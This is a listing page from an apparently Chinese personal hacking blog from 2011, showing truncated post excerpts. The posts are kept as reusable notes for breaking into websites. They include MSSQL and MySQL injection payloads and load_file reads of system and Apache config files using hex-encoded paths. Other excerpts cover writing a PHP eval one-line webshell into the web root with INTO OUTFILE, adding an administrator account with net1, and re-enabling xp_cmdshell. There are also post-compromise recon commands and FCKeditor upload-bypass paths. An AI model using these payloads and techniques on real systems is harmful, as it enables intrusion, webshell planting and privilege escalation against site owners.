上一页 1 ··· 18 19 20 21 22 23 24 25 26 ··· 30 下一页

2011年4月23日

Mssql显错和不显错模式下的注入

摘要: 近期用手工注入用习惯了,便列出最近用的Mssql语句,以后方便拿来用!-----------------------------------------------------------------------------------------------------------------------------------Mssql注释符:#--显错模式的:判断是否支持多行;declare @x int--查看当前数据库版本URL?id=13 and @@version>0--查看当前连接数据库用户URL?id=13 and user>0--查看当前数据库名URL?id=1 阅读全文

posted @ 2011-04-23 17:22 =_=! 阅读(836) 评论(0) 推荐(0) 编辑

2011年4月21日

linux 通过 mysql 的 load_file 来找 apache 网站首页目录

摘要: 通过前提是有loadfile的权限啦,当然单引号自然是被转义了的,所以路径必须用十六进制或者ascii码编码了。 先通过:/etc/issue,来看系统版本(路径已经16进制写的):load_file(0x2F6574632F6973737565) 得到:Red Hat Enterprise Linux Server release 5.1 (Tikanga) Kernel 然后搜下这个版本的 apache web 默认路径:/etc/httpd/conf/httpd.conf 再次 loadfile 啦:load_file(0x2F6574632F68747470642F636F6E662F 阅读全文

posted @ 2011-04-21 16:15 =_=! 阅读(159) 评论(0) 推荐(0) 编辑

net 禁止/add 换个方法添加用户

摘要: 本地写个加用户的脚本:net1 user admin admin /addnet1 localgroup administrators user /add然后转换成exe,扔上去。用屁眼执行... 阅读全文

posted @ 2011-04-21 07:33 =_=! 阅读(317) 评论(0) 推荐(0) 编辑

2011年4月20日

MySQL导出一句话拿WebShell的方法

摘要: 叶子's blog文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表Select cmd from temp into out file 'F:/wwwroot/eval. 阅读全文

posted @ 2011-04-20 10:39 =_=! 阅读(576) 评论(0) 推荐(0) 编辑

load_file()查看常用的一些配置文件

该文被密码保护。 阅读全文

posted @ 2011-04-20 07:48 =_=! 阅读(2) 评论(0) 推荐(0) 编辑

linux webshell下信息收集和一些提权常用的命令

摘要: cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc/sudoers中有此账户的规则.id – 查看当前用户各种id.which wget curl w3m lynx – 查看当前可用的下载器uname -r -查看内核版本信息 (or) cat /etc/release 阅读全文

posted @ 2011-04-20 06:45 =_=! 阅读(507) 评论(0) 推荐(0) 编辑

2011年4月17日

MSSQL入侵恢复xp_cmdshell方法总结

摘要: MSSQL弱口令入侵已经很罕见了,但在内网时有时还能用到,今天在搞机器的时候遇上一MSSQL2005,第一次见这错误信息,搜索到答案,贴在BLOG上以后遇上备用.-----------------------------------------------------------------------------------------------------------错误信息:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通 阅读全文

posted @ 2011-04-17 23:34 =_=! 阅读(2634) 评论(0) 推荐(0) 编辑

网页编辑器漏洞手册FCKeditor,eWebEditor,WebEditorNet,bigcneditor,CuteEditor

摘要: FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径Note:[Hell 阅读全文

posted @ 2011-04-17 23:27 =_=! 阅读(510) 评论(0) 推荐(0) 编辑

不改文件名的情况下上传突破

摘要: 方法不错,首先就是不强制改上传文件名。还有就是上传目录没有执行的权限。然后用这方法貌似就可以上传到上级可写目录了。比如抓这是抓的上传数据包:POST /upload/upfile.asp HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, 阅读全文

posted @ 2011-04-17 12:13 =_=! 阅读(192) 评论(0) 推荐(0) 编辑

2011年4月16日

最新突破fckeditor编辑器上传漏洞通杀asp、aspx版本

摘要: 经测试,此方法通杀asp、aspx版本,不适用于php。之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了。以下是误打误撞的方法,不知道黑扩们发了没。仍然利用的以下地址:http://www.xxx.com/fckeditor/editor/filemanager/connectors/test.html利用过程:1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建 阅读全文

posted @ 2011-04-16 12:16 =_=! 阅读(1670) 评论(0) 推荐(0) 编辑

上一页 1 ··· 18 19 20 21 22 23 24 25 26 ··· 30 下一页

导航